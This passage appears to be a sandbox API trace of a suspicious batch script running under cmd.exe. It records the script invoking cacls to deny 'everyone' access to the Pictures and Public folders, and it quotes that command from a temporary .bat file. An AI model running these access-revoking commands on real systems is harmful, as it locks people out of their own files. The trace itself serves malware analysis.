(_String1="cacls", _String2="DATE") returned -1 [0036.155] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.155] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.155] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.155] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.155] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.155] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.155] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.155] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.155] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.155] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.155] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.155] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.155] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.155] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.155] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.155] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.155] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.155] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.155] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.155] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.155] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.155] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.155] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.155] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.155] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.155] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.155] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.155] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.155] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.155] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.155] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.155] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.155] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.155] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.155] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.155] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.155] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.155] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.156] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.156] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.156] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.156] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.156] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.156] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.156] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.156] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.156] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.156] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.156] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.156] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.156] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.156] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.156] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.156] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.156] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.156] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.156] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.156] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.156] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.156] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.156] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.156] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.156] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.156] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.156] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.156] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.156] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.156] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.156] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.156] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.156] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.156] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0036.156] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0036.156] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0036.156] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.156] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.156] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.156] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.156] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.156] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.156] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.156] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.156] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.156] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.156] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.156] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.156] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.156] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.157] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.157] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.157] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.157] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.157] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.157] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.157] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.157] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.157] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.157] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.157] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.157] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.157] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.157] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.157] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.157] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.157] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.157] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.157] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.157] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.157] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.157] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.157] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.157] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.157] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.157] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.157] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.157] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.157] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.157] SetErrorMode (uMode=0x0) returned 0x0 [0036.157] SetErrorMode (uMode=0x1) returned 0x0 [0036.157] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1baf0, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0036.157] SetErrorMode (uMode=0x0) returned 0x1 [0036.157] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.157] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.157] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.157] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.157] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.157] GetLastError () returned 0x2 [0036.158] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.158] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18540 [0036.158] FindClose (in: hFindFile=0xd18540 | out: hFindFile=0xd18540) returned 1 [0036.158] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.158] GetLastError () returned 0x2 [0036.158] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18540 [0036.158] FindClose (in: hFindFile=0xd18540 | out: hFindFile=0xd18540) returned 1 [0036.158] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.158] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.158] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.158] SetErrorMode (uMode=0x0) returned 0x0 [0036.158] SetErrorMode (uMode=0x1) returned 0x0 [0036.158] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd15fa0, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0036.158] SetErrorMode (uMode=0x0) returned 0x1 [0036.158] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.158] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.158] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.158] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.158] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.158] GetLastError () returned 0x2 [0036.158] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.159] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bef0 [0036.159] FindClose (in: hFindFile=0xd1bef0 | out: hFindFile=0xd1bef0) returned 1 [0036.159] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.159] GetLastError () returned 0x2 [0036.159] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bef0 [0036.159] FindClose (in: hFindFile=0xd1bef0 | out: hFindFile=0xd1bef0) returned 1 [0036.159] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.159] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.159] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.159] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.159] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.159] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.159] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.159] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.159] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.159] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.159] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.159] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.159] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.159] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.159] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.159] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.159] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.160] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.160] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.160] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Pictures\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Users\\5JgHKoaOfdp\\Pictures\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Pictures\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x80, hThread=0x94, dwProcessId=0xba0, dwThreadId=0xba4)) returned 1 [0036.163] CloseHandle (hObject=0x94) returned 1 [0036.163] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.163] GetEnvironmentStringsW () returned 0xd1b020* [0036.163] FreeEnvironmentStringsA (penv="=") returned 1 [0036.163] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.163] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0036.163] _close (_FileHandle=4) returned 0 [0036.163] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0 [0036.254] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0036.254] CloseHandle (hObject=0x8c) returned 1 [0036.254] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0036.294] GetExitCodeProcess (in: hProcess=0x80, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0036.294] CloseHandle (hObject=0x80) returned 1 [0036.294] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.294] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0036.294] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.294] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0036.294] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.294] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.294] SetConsoleInputExeNameW () returned 0x1 [0036.294] GetConsoleOutputCP () returned 0x1b5 [0036.294] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.294] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.295] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0036.295] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0036.295] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.295] SetFilePointer (in: hFile=0x80, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0036.295] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0036.295] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x652, lpOverlapped=0x0) returned 1 [0036.295] SetFilePointer (in: hFile=0x80, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0036.295] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n\n\r\n=%%i\r\n") returned 51 [0036.295] GetFileType (hFile=0x80) returned 0x1 [0036.295] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.295] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0036.295] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.296] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.296] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.296] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.296] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.296] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.296] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.296] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0036.296] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0036.296] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0036.296] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0036.296] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0036.296] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0036.296] _tell (_FileHandle=3) returned 1103 [0036.296] _close (_FileHandle=3) returned 0 [0036.296] _pipe (in: _PtHandles=0xd26010, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd26010) returned 0 [0036.296] _dup (_FileHandle=1) returned 5 [0036.296] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0036.296] _close (_FileHandle=4) returned 0 [0036.296] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.296] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.296] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.296] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.296] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.296] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.296] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.296] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.296] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.296] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.296] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.296] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.296] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.296] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.296] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.296] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.296] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.296] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.296] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.296] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.296] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.297] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0036.297] SetErrorMode (uMode=0x0) returned 0x0 [0036.297] SetErrorMode (uMode=0x1) returned 0x0 [0036.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd18250, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0036.297] SetErrorMode (uMode=0x0) returned 0x1 [0036.297] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0036.297] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.297] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.297] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd18390 [0036.297] FindClose (in: hFindFile=0xd18390 | out: hFindFile=0xd18390) returned 1 [0036.297] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0036.297] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0036.297] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.297] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.297] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.297] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, 